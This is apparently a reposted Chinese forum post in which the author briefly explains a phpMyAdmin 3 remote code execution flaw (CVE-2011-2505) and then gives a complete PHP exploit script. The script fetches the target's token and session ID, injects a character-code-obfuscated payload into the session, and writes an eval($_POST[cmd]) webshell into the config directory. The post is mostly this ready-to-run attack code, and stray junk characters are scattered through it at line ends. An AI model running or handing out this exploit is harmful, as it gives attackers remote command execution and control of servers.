最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
6 m4 j( F# O- @# @' U y3 `- n0 s: R3 r5 K% H1 q P7 W
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
9 K" f& B/ S: F9 I$ ~
/ `- b+ V) [ s5 f' S首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
) z1 ]- j' _: [ \一是session.auto_start = 1;
1 b2 n( U$ e: {5 P2 T, S二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。' R' L5 a) S( E" v* |( \! h
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
+ X/ q# q1 ]" I8 u/ W. K
$ ?6 M$ x# S5 Q# Z% o在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。9 t' {) k9 F* p7 u' X, v0 B! S
7 _! ^; \# n/ J
于是写了这个php版本的exp,代码如下:4 {" @. b+ a" t* |7 r: x$ _; C8 E
# `9 E* F8 {; b' x2 @
#!/usr/bin/php5 V m1 Z U9 K9 g1 w5 z
<?php
: I4 m. i. {, I$ Z7 C3 Yprint_r('0 [% i5 v# h/ t; V( \
+---------------------------------------------------------------------------+3 O" x) Y: k2 S% X1 p$ G
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
! c4 o9 \4 u$ Q' k# h+ q6 f& Z( Pby oldjun(www.oldjun.com)6 g. N6 n7 P0 [* F/ {* s5 P! X! U9 I
welcome to www.t00ls.net
) U+ Q- I) m* g. F4 J- M. i6 Umail: oldjun@gmail.com c! X- T6 ~; k/ G1 f8 ^
Assigned CVE id: CVE-2011-2505) q& p7 w/ Y s0 U; Y& h7 n
+---------------------------------------------------------------------------+/ Q4 w9 S* E' t& r0 X+ O$ B2 G1 o
');
; l5 [1 |" @- N0 t+ p( N, N/ k# {( Z1 r6 C% @3 {5 z( R, ]
/**
' t- K2 V; z! ?9 l! \ S. ? * working when the directory:"config" exists and is writeable.
. F' a2 X2 M2 {- z8 J0 Z9 U2 v**/3 a0 T' _- j# F7 K9 R
+ ~( g2 ?# a1 w: Y [$ `0 o ~
if ($argc < 3) {
' T# X* }$ ?/ E7 F1 H# z+ ~ print_r('
9 S& Z3 g1 \. n% \2 ~+---------------------------------------------------------------------------+
% b! t7 ?( C KUsage: php '.$argv[0].' host path
% L8 _& B: O& H1 b0 I& ]+ Ihost: target server (ip/hostname)* N9 P) K! ^7 I& {7 N
path: path to pma3
2 s: X/ W0 Z8 q( R1 PExample:
" v8 }* t1 X: D: q6 Y jphp '.$argv[0].' localhost /pma/
E" b# H- A( n2 T" \+ ~% T/ A+---------------------------------------------------------------------------+
4 `/ @! O' j; j& d, b" C; n');7 @) W- L) n5 P
exit;
4 L# Y& _; F$ ~, l}. L+ }# U9 q. s ~, a; T F: E8 V
& ]- K1 d9 I; v. c& i- k3 S$host = $argv[1];; v# ]4 m6 B4 O
$path = $argv[2]; N" z- Q+ j: d
8 P7 I! ^1 M- x- f9 h% H2 L, b2 P/*** h5 U: y, [- P6 A; I% O
* Try to determine if the directory:"config" exists9 ~4 }$ p6 j, l, R- X) `* e
**/
9 E5 V9 U* \5 Q0 q" Recho "[+] Try to determine if the directory:config exists....\n";
! q1 B2 Q0 O- z$returnstr=php_request('config/');
. H7 o* w( C7 L6 S& dif(strpos($returnstr,'404')){
( x ~0 S* ]5 F V2 y7 w exit("[-] Exploit Failed! The directory:config do not exists!\n");3 R% J8 L, I3 r( o2 ~
}+ w3 i% x* u( F0 B& |3 S1 l+ |
" A, t5 m8 A j6 T
/**" M5 M9 x4 S) R3 K( l% F" y M4 K
* Try to get token and sessionid' M! C) ~! l9 F( @; b5 m+ H9 p* S
**/
( U4 N5 e- b6 Pecho "[+] Try to get token and sessionid....\n";
( C l" d! f {0 d8 W$result=php_request('index.php');" _% C4 v& N, n/ Y6 O4 B
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);5 Y9 [; _; J( c3 R* y! h, d- c
$token=$resp[3];# g0 E* w$ D5 m& C& J" i* H! \. G
$sessionid=$resp[1];+ v, k1 i) E7 S
if($token && $sessionid){
- X$ h% p+ `( \# ^4 n echo "[+] token token\n";/ ]* A; l' ]2 ]) Z
echo "[+] Session IDsessionid\n";
7 V9 b4 L7 f! b5 N}else{
# J' M" v e( E* S3 ~ exit("[-] Can't get token and Session ID,Exploit Failed!\n");
+ B. P" W1 M+ n}
Y9 B0 R. i+ f
: s9 }) G: W1 g+ V% H5 b- n/**
* N: w3 [" L9 s/ `4 P' I * Try to insert shell into session
8 K3 }$ J" e( @( a- C- t8 C. R**/" s3 ~3 b0 L) h3 c' i
echo "[+] Try to insert shell into session....\n";, B$ ~+ y: H0 A1 M
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.! T* U: r& x, l. p
0 D' E* D9 r& g2 h/**9 N* c3 W1 L* [7 N9 c# ]+ o
* Try to create webshell
; H9 [7 e: k( I4 \**/
! R2 \+ n' b( j4 Z9 ?- g( \3 Qecho "[+] Try to create webshell....\n";
# X- @2 w1 }: `0 x# U3 jphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
" W4 Q( z! ^. A* K4 j6 U( z' M: |+ C/**
8 i+ \6 @" h* s4 K2 c9 i6 k% g1 ~ * Try to check if the webshell was created successfully
& Y. G$ K0 J+ _8 Z**/
2 Z5 f! s l) recho "[+] Try to check if the webshell was created successfully....\n";
# A& H! b7 |6 Y0 M: a; v$content=php_request('config/config.inc.php');. V3 f q6 J& F4 ^
if(strpos($content,'t00ls')){
/ q! g5 V3 E9 E' [5 b4 c- g echo "[+] Congratulations! Expoilt successfully....\n";
7 o- w+ Q( A' p/ g$ r- [' u2 y0 F echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
! d ?, M5 K) S}else{; {+ y( O8 W5 q1 P- R! S8 i! a
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
0 y5 I2 k4 t( S. X) B% D o}
' V, d* O# [7 V: E
" R7 h, k: V5 c# D( i t% Y& Jfunction php_request($url,$data='',$cookie=''){
' e2 Z8 A" N% s( }2 y# U: W2 y global $host, $path;5 w6 P6 k: ^: z( R' ?
3 l% G w( ~: j* Z $method=$data?'POST':'GET';) Z }6 X0 E3 ~4 m* X( o! c6 L
/ {3 M k w. j& X $packet = $method." ".$path.$url." HTTP/1.1\r\n";
2 Z5 c) q% K+ v6 M2 z c0 a# A $packet .= "Accept: */*\r\n";4 c, F5 x4 F6 H: s' R$ z7 t g
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; |) m# R k. Z; F4 |. M1 f8 i, ~
$packet .= "Host: $host\r\n";
& N+ F9 k3 ]7 E5 N) \9 E $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";; Q% u- C3 h4 g7 h/ V! @4 `4 y
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
$ W: {/ A* k6 v! a6 F" B- U $packet .= $cookie?"Cookie: $cookie\r\n":"";% }$ r }/ D3 V7 J7 T
$packet .= "Connection: Close\r\n\r\n";
' w; }9 h: b% T8 l8 \4 E) ? $packet .= $data?$data:"";" o8 A! R9 y9 H
7 N, w+ _+ F5 D+ x1 d' G- x$ r $fp = fsockopen(gethostbyname($host), 80);
" y3 n+ t4 I7 m+ Q8 F/ Q4 O if (!$fp) {, `1 ?" a/ r1 I7 w+ E% N+ k D
echo 'No response from '.$host; die;
1 E& _; Z9 e: b7 l }
+ A ^9 E6 u1 G% j8 X. J fputs($fp, $packet);
2 O8 u+ w0 {$ t3 l
! V( E8 U$ w: r. A $resp = '';
9 b$ M% N3 C+ P$ s: F$ Z9 W" o A0 _" v% m
while ($fp && !feof($fp)), w. S4 F1 U; r
$resp .= fread($fp, 1024);
5 \! T; i" S1 n4 {
8 Y1 K1 `* D7 m. h0 f return $resp;- a/ M! g2 ]' f# |9 _
}
* _: m" K+ b; H. t8 A# `6 G3 A% a
# V" m; o% V, ]. S" C: z1 ~, Z?>
9 r1 X" A( t! f! I' n% T. |
发表于 2013-2-21 09:13:03
收藏
支持
反对